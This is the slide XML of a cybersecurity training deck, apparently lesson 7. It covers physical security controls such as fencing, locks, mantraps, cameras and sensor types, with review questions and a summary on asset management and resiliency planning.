            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 7C - Physical Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{971A48E5-2133-9CF0-7940-813AA39EF5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical security concepts are a critical component of cybersecurity. Physical security measures, such as access control, video surveillance, and environmental controls, help protect an organization’s physical assets, including servers, datacenters, and other critical infrastructure, from unauthorized access, theft,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or damage. Effective physical security practices help prevent unauthorized physical access to sensitive data or systems and reduce the risk of insider threats. Organizations must integrate physical security practices into their cybersecurity strategies to provide a layered approach to security and protect against cyber threats that exploit physical vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Physical Security Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical access controls depend on the same access control fundamentals as technical system security:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Accounting</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29932362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80E0C-0675-A55B-6CE9-EE767AB8C652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Site Layout, Fencing, and Lighting</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69109CC3-3E7F-F6CF-0034-A5AB0EE947DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical Security Through Environmental Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Barricades and Entry/Exit Points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fencing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lighting</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Bollards</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Existing Structures</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 543">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEB0EE9-313B-161F-9FE7-D752545A8DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089525" y="2671337"/>
            <a:ext cx="4184650" cy="2859938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9045274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24EBB-CC18-E84A-7AFD-449E4A6AE292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Gateways and Locks</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21AF32F-5798-4B2C-819A-9459E9FD4146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To secure a gateway it must be fitted with a lock. A secure gateway will normally be self-closing and self-locking rather than dependent on the user to close and lock it. Lock types can be categorized as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Physical</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Electronic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Biometric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control Vestibule (Mantrap)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cable Locks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Badges</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 544">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB61AF78-B9EA-FFB6-10C5-0E8FD5D5D63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429567" y="1829870"/>
            <a:ext cx="4184650" cy="1799672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 545">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D6EC10-FA86-E76B-84E0-6841847E36BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429567" y="3841114"/>
            <a:ext cx="4039235" cy="2017395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3131044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0AC41-FF42-A1E5-45E3-34D200FBEA3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TOPIC 2A – THREAT ACTORS</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0694DD44-A9BE-584D-C4D6-267D3CCE9A54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="972872" y="2578100"/>
            <a:ext cx="10244668" cy="3073400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102422554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8BFC-BCC5-52AF-9534-695D6249B665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="222943"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Guards and Cameras</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97205C9C-B5D3-FF28-7D83-66D4EC4E5DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1231900"/>
            <a:ext cx="5040842" cy="5549899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Camera systems and robotics can use AI and machine learning to implement smart physical security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>theverge.com/2018/1/23/16907238/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>artificial-intelligence-surveillance-cameras-security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Motion Recognition</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Object Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Drones/UAV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Alarm Systems and Sensors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Motion Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Noise Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Proximity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Duress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sensor Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Infrared sensors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Pressure sensors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Microwave sensors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>technology motion sensors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Ultrasonic sensors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 547">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C526FC0B-7485-4B28-33CF-760B2F81B9A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473825" y="2507355"/>
            <a:ext cx="4184650" cy="2806902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124191613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D7764-9F89-B83A-01A9-1774C3C8B852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Physical Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E782A3C-9891-5AE7-2458-29974F23FFF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What physical site security controls act as deterrents?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>How might a proximity reader be used for site security?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What type of sensor detects changes in heat patterns caused by moving objects?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What is a bollard?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284368923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0D968-CD71-B4E0-878D-44575DA1E159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766234" y="156237"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 7 - Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B4E971-BFC0-E255-840E-1B8B95E8FBC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="762000"/>
            <a:ext cx="10748432" cy="6096001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Guidelines for Asset Management and Resiliency Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>The following are important asset management concepts:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Perform asset identification : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Catalog all assets, both physical and intangible, owned by an organization, Include key information such as asset type, location, value, and ownership.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Implement asset lifecycle management  This includes rules for procurement, maintenance, depreciation, and eventual retirement or replacement of an asset.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Perform asset tracking: Keep track of the location and status of assets, especially those that are mobile or prone to theft.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Understand regulatory compliance requirements : Certain assets, such as those related to health and safety, data protection, or environmental impact must be managed in compliance with specific regulations to avoid legal penalties.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Perform disaster recovery and business continuity planning : Plans should be in place to quickly replace or restore critical assets in case of disasters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Secure asset disposal : Using legally compliant and secure methods to destroy data</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Ensure adequate capacity planning for people, technology, and infrastructure. Implement high availability strategies including the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Scalability and elasticity, Fault tolerance and redundancy, Clustering, Site resiliency</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Using risk assessments, identify assets that have high availability requirements and provision redundancy to meet this requirement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Hot, warm, or cold site resources to recover from disasters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use dual power supply, PDUs, PSUs, and generators to make the power system resilient.</a:t>
